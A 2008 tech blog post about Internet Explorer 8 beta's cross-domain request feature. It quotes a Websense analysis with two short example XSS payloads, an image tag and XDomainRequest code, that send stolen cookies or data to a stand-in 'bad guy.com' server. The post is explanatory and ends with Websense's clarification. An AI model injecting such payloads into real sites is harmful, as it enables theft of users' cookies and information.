March 13th, 2008

IE 8: Cross scripting defense a double-edged sword

Posted by Larry Dignan @ 8:02 am

Categories: Browsers, Exploit code, Microsoft, Vulnerability research, Zero-day attacks

Tags: Attacker, Microsoft Internet Explorer, Microsoft Corp., Web Browsers, Security, Internet, Larry Dignan

Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.

Folks–especially security researchers–are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft’s protection enhancements.

For instance, Websense hones in on IE 8’s cross domain request restrictions. Frankly, Websense’s post is a bit over my head, but the money excerpt is notable.

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<imgsrc=”http://bad guy.com/steal.php?cookie=” + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest();
xdr.open(”POST”, “http://www.bad guy.com/”);
xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By time IE 8 clears its beta hurdles there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

Update: Tweaked the headline. Websense got back to me with the following clarification. In a nutshell, I goofed. Websense clarifies:

The new ability of cross-domain requests does not really increase the attack surface, but simply provides an additional, easier means to communicate externally. As you can see this provides benefits not only to developers but to malicious folks as well.